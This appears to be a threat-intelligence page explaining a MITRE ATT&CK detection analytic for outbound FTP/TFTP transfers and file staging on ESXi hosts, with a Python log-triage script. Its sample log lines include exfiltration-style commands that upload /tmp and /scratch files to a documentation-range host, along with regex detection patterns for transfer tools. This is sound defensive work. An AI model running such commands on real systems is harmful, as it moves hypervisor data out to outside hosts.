AN1172: Analytic 1172
Detects file movement or outbound TFTP/FTP transfers from ESXi host initiated via shell commands or injected scripts, particularly from scratch partitions or /tmp.
Analyst context for executives and security teams
AN1172 is a detection analytic for ESXi environments focused on suspicious file movement or outbound TFTP/FTP transfers initiated from shell commands or injected scripts, especially when activity originates from scratch partitions or /tmp. For leaders, the practical issue is visibility into hypervisor-level activity: if ESXi hosts can move files outward without strong monitoring, an incident may affect virtualization infrastructure before normal endpoint controls see it.
Executive priority
Prioritize this analytic where ESXi supports critical workloads. The business question is whether the organization can produce evidence of unusual shell-driven file movement and outbound FTP/TFTP activity from hypervisors during an incident or audit. This matters for operational resilience, incident response readiness, and control assurance around systems that may sit outside standard endpoint monitoring coverage.
Technical view
SOC and IR teams should validate whether ESXi host telemetry can show shell command execution, script-driven activity, file movement from scratch partitions and /tmp, and outbound FTP or TFTP network connections. Because ATT&CK provides no detailed detection logic for this analytic, teams should treat AN1172 as a coverage objective rather than a finished rule: confirm data sources, define expected administrative behavior, and tune for unusual source paths, transfer protocols, and command contexts on ESXi.
Likely telemetry
- ESXi shell command history or command execution logs where available
- Host file activity involving scratch partitions
- Host file activity involving /tmp
- Outbound network connection records from ESXi hosts
- FTP traffic from ESXi hosts
Detection direction
- Validate that ESXi hosts are included in logging and monitoring scope, not only guest virtual machines.
- Look for outbound FTP/TFTP transfers initiated from ESXi shell commands or scripts, with attention to activity involving scratch partitions or /tmp.
- Baseline legitimate administrative file transfers to reduce false positives from maintenance, backup, or support workflows.
- Investigate whether telemetry distinguishes interactive shell use from scripted or injected execution.
- Identify blind spots where hypervisor logs, network egress records, or temporary-directory file activity are not retained or centralized.
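As an added illustration (not part of the ATT&CK object or of Glexia's analysis), the following Python triage script applies the detection direction above to constructed lines approximating ESXi /var/log/shell.log entries. The log line format, the regexes, and the choice of /tmp and /scratch as staging paths are assumptions to be adapted to local logging and approved transfer workflows.

```python
import re
from dataclasses import dataclass

# Constructed sample lines approximating ESXi /var/log/shell.log entries (not real telemetry).
SAMPLE_SHELL_LOG = """\
2026-01-15T10:01:02Z shell[2099]: [root]: esxcli network ip interface list
2026-01-15T10:02:11Z shell[2099]: [root]: tftp -p -l /tmp/hostinfo.txt 192.0.2.50
2026-01-15T10:03:40Z shell[2099]: [root]: cp /vmfs/volumes/datastore1/x.vmx /scratch/x.vmx
2026-01-15T10:03:55Z shell[2099]: [root]: curl -T /scratch/x.vmx ftp://192.0.2.50/upload/
2026-01-15T10:05:00Z shell[2104]: [admin]: curl -o /tmp/patch.zip https://updates.example.com/patch.zip
2026-01-15T10:06:12Z shell[2104]: [admin]: ftp 192.0.2.60
"""

# Assumed line layout: <timestamp> shell[<pid>]: [<user>]: <command>
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+shell\[(?P<pid>\d+)\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$")
# Outbound FTP/TFTP indicators: client binaries as a standalone word, or ftp:// / tftp:// URLs.
TRANSFER_RE = re.compile(r"(?:^|\s)(?:tftp|ftp|lftp)(?:\s|$)|\b(?:t?ftp)://", re.I)
# Local file movement commands that may stage data before a transfer.
MOVE_RE = re.compile(r"(?:^|\s)(?:cp|mv|tar|scp)(?:\s|$)")
# Source paths the analytic calls out: /tmp and the scratch partition (/scratch on ESXi).
STAGING_RE = re.compile(r"""(?:^|[\s='"])(/tmp|/scratch)(?:/|\s|$)""")


@dataclass
class Finding:
    ts: str
    user: str
    cmd: str
    severity: str  # "high": FTP/TFTP + staging path; "review": FTP/TFTP only; "low": file movement touching staging path


def classify(cmd: str):
    """Return a severity label for one shell command, or None if it matches nothing of interest."""
    transfer = bool(TRANSFER_RE.search(cmd))
    staging = bool(STAGING_RE.search(cmd))
    if transfer and staging:
        return "high"
    if transfer:
        return "review"
    if staging and MOVE_RE.search(cmd):
        return "low"
    return None


def scan_shell_log(text: str):
    """Parse shell.log text and return Findings in log order; unparseable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        sev = classify(m["cmd"])
        if sev:
            findings.append(Finding(m["ts"], m["user"], m["cmd"], sev))
    return findings


if __name__ == "__main__":
    for f in scan_shell_log(SAMPLE_SHELL_LOG):
        print(f"{f.severity:6} {f.ts} {f.user}: {f.cmd}")
```

Baseline the "review" and "low" tiers against known maintenance and backup jobs before alerting on them; the "high" tier is the closest match to the analytic's stated behavior.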
Mitigation priorities
- Restrict and monitor ESXi shell access according to operational need.
- Control outbound network paths from ESXi hosts, especially FTP and TFTP where not required.
- Harden administrative workflows so file movement from hypervisors is authorized, logged, and reviewable.
- Ensure incident response procedures include ESXi host evidence collection, not only VM or endpoint artifacts.
- Maintain retention and centralization of relevant ESXi and network telemetry for investigation and compliance evidence.
Analyst notes and limits
The supplied ATT&CK object is a detection analytic, not a technique, and includes no tactic mapping or relationship context. Its value is primarily as a validation prompt for ESXi monitoring coverage around file movement and outbound FTP/TFTP behavior from shell or script contexts.
Official detection logic was not provided, and no relationships were supplied. This take therefore does not assert specific detection fidelity, adversary use, impact, or coverage. Local ESXi configuration, logging availability, and approved administrative transfer patterns are required to operationalize the analytic.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 0709538f1a9b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN1172
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.